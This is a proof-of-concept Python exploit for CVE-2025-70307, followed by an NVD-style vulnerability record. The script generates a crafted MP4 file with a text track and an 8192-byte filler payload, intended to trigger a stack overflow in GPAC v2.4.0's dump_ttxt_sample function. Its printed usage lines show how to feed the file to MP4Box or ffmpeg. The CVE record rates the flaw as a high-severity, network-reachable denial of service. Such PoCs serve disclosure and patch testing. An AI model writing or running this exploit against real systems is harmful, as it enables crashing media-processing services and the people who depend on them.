CVE-2025-70307

#!/usr/bin/env python3 # CVE-2025-70307 PoC - GPAC dump_ttxt_sample Stack Overflow # Generate malicious MP4 file with oversized tx3g sample to trigger DoS import struct import sys def create_poc_mp4(): """ Generate a PoC MP4 file that triggers stack overflow in GPAC's dump_ttxt_sample function. The malicious file contains an oversized tx3g text sample that causes buffer overflow. """ # MP4 file structure with malicious tx3g data poc_data = bytearray() # ftyp box - File Type Box ftyp = b'ftyp' major_brand = b'isom' minor_version = struct.pack('>I', 0x200) compatible_brands = b'isomiso2mp41' ftyp_size = 8 + 4 + 4 + len(compatible_brands) poc_data += struct.pack('>I', ftyp_size) + ftyp + major_brand + minor_version + compatible_brands # moov box - Movie Box (container) moov_data = bytearray() # mvhd box - Movie Header Box mvhd = b'mvhd' mvhd_data = bytearray() mvhd_data += struct.pack('>I', 0) # version mvhd_data += b'\x00' * 3 + struct.pack('>I', 1) # creation time mvhd_data += b'\x00' * 3 + struct.pack('>I', 1) # modification time mvhd_data += struct.pack('>I', 1000) # timescale mvhd_data += struct.pack('>I', 1000) # duration mvhd_data += struct.pack('>I', 0x00010000) # rate mvhd_data += struct.pack('>H', 0x0100) # volume mvhd_data += b'\x00' * 10 # reserved mvhd_data += b'\x00' * 36 # matrix mvhd_data += b'\x00' * 24 # pre-defined mvhd_data += struct.pack('>I', 2) # next_track_ID mvhd_box = struct.pack('>I', len(mvhd_data) + 8) + mvhd + mvhd_data moov_data += mvhd_box # trak box - Track Box trak_data = bytearray() # tkhd box - Track Header Box tkhd = b'tkhd' tkhd_data = bytearray() tkhd_data += struct.pack('>I', 0) # version tkhd_data += b'\x00' * 3 + struct.pack('>I', 1) # creation time tkhd_data += b'\x00' * 3 + struct.pack('>I', 1) # modification time tkhd_data += struct.pack('>I', 1) # track_ID tkhd_data += struct.pack('>I', 0) # reserved tkhd_data += struct.pack('>I', 1000) # duration tkhd_data += b'\x00' * 8 # reserved tkhd_data += struct.pack('>H', 0) # layer tkhd_data += struct.pack('>H', 0) # alternate_group tkhd_data += struct.pack('>H', 0) # volume tkhd_data += struct.pack('>H', 0) # reserved tkhd_data += b'\x00' * 36 # matrix tkhd_data += struct.pack('>I', 320) # width tkhd_data += struct.pack('>I', 240) # height tkhd_box = struct.pack('>I', len(tkhd_data) + 8) + tkhd + tkhd_data trak_data += tkhd_box # mdia box - Media Box mdia_data = bytearray() # mdhd box - Media Header Box mdhd = b'mdhd' mdhd_data = bytearray() mdhd_data += struct.pack('>I', 0) # version mdhd_data += b'\x00' * 3 + struct.pack('>I', 1) # creation time mdhd_data += b'\x00' * 3 + struct.pack('>I', 1) # modification time mdhd_data += struct.pack('>I', 1000) # timescale mdhd_data += struct.pack('>I', 1000) # duration mdhd_data += struct.pack('>H', 0x55C4) # language (und) mdhd_data += struct.pack('>H', 0) # pre_defined mdhd_box = struct.pack('>I', len(mdhd_data) + 8) + mdhd + mdhd_data mdia_data += mdhd_box # minf box - Media Information Box minf_data = bytearray() # stsd box - Sample Description Box with tx3g stsd = b'stsd' stsd_data = bytearray() stsd_data += struct.pack('>I', 0) # version stsd_data += struct.pack('>I', 1) # entry_count # tx3g sample entry - TEXT track with oversized data tx3g = b'tx3g' tx3g_data = bytearray() tx3g_data += b'\x00' * 6 # reserved tx3g_data += struct.pack('>H', 1) # data_reference_index tx3g_data += b'\x00' * 8 # display flags, textJustification, backgroundColor tx3g_data += struct.pack('>H', 16) # textTopMargin tx3g_data += struct.pack('>H', 16) # textLeftMargin tx3g_data += struct.pack('>H', 16) # textRightMargin tx3g_data += struct.pack('>H', 16) # textBottomMargin tx3g_data += struct.pack('>H', 255) # textColorRed tx3g_data += struct.pack('>H', 255) # textColorGreen tx3g_data += struct.pack('>H', 255) # textColorBlue tx3g_data += struct.pack('>H', 255) # textColorAlpha tx3g_data += struct.pack('>I', 0) # font_ID tx3g_data += struct.pack('>H', 12) # font_face tx3g_data += struct.pack('>B', 0) # font_name_string_length tx3g_size = 8 + len(tx3g_data) stsd_data += struct.pack('>I', tx3g_size) + tx3g + tx3g_data stsd_box = struct.pack('>I', len(stsd_data) + 8) + stsd + stsd_data minf_data += stsd_box # stts box - Time to Sample Box stts = b'stts' stts_data = struct.pack('>I', 0) + struct.pack('>I', 0) stts_box = struct.pack('>I', len(stts_data) + 8) + stts + stts_data minf_data += stts_box # stsc box - Sample to Chunk Box stsc = b'stsc' stsc_data = struct.pack('>I', 0) + struct.pack('>I', 0) stsc_box = struct.pack('>I', len(stsc_data) + 8) + stsc + stsc_data minf_data += stsc_box # stsz box - Sample Size Box stsz = b'stsz' stsz_data = struct.pack('>I', 0) + struct.pack('>I', 0) stsz_box = struct.pack('>I', len(stsz_data) + 8) + stsz + stsz_data minf_data += stsz_box # stco box - Chunk Offset Box stco = b'stco' stco_data = struct.pack('>I', 0) + struct.pack('>I', 0) stco_box = struct.pack('>I', len(stco_data) + 8) + stco + stco_data minf_data += stco_box # Wrap minf box minf = b'minf' minf_box = struct.pack('>I', len(minf_data) + 8) + minf + minf_data mdia_data += minf_box # Wrap mdia box mdia = b'mdia' mdia_box = struct.pack('>I', len(mdia_data) + 8) + mdia + mdia_data trak_data += mdia_box # Wrap trak box trak = b'trak' trak_box = struct.pack('>I', len(trak_data) + 8) + trak + trak_data moov_data += trak_box # Wrap moov box moov = b'moov' moov_box = struct.pack('>I', len(moov_data) + 8) + moov + moov_data poc_data += moov_box # mdat box - Media Data Box with malicious tx3g sample mdat = b'mdat' # Create oversized tx3g sample data to trigger stack overflow overflow_size = 8192 # Large overflow data malicious_tx3g = b'A' * overflow_size # Pattern to overflow stack buffer mdat_data = malicious_tx3g mdat_box = struct.pack('>I', len(mdat_data) + 8) + mdat + mdat_data poc_data += mdat_box return bytes(poc_data) def main(): print("[*] Generating CVE-2025-70307 PoC for GPAC stack overflow") print("[*] Target: GPAC v2.4.0 dump_ttxt_sample function") poc_file = create_poc_mp4() output_file = "CVE-2025-70307-poc.mp4" with open(output_file, 'wb') as f: f.write(poc_file) print(f"[+] PoC file created: {output_file}") print(f"[+] File size: {len(poc_file)} bytes") print("[*] Usage: Feed this file to vulnerable GPAC application") print(" Example: MP4Box -dump-text {poc_file}") print(" Or: ffmpeg -i {poc_file} output.mp4") if __name__ == "__main__": main()

{"cve": {"id": "CVE-2025-70307", "sourceIdentifier": "[email protected]", "published": "2026-01-15T18:16:37.767", "lastModified": "2026-01-30T17:58:53.770", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A stack overflow in the dump_ttxt_sample function of GPAC v2.4.0 allows attackers to cause a Denial of Service (DoS) via a crafted packet."}, {"lang": "es", "value": "Un desbordamiento de pila en la función dump_ttxt_sample de GPAC v2.4.0 permite a los atacantes causar una denegación de servicio (DoS) mediante un paquete manipulado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-121"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:gpac:gpac:2.4.0:*:*:*:*:*:*:*", "matchCriteriaId": "C8D68051-EBCD-445B-A060-EAC407CE2D39"}]}]}], "references": [{"url": "https://github.com/zakkanijia/POC/blob/main/gpac_boxDump/GPAC_tx3g.md", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}]}}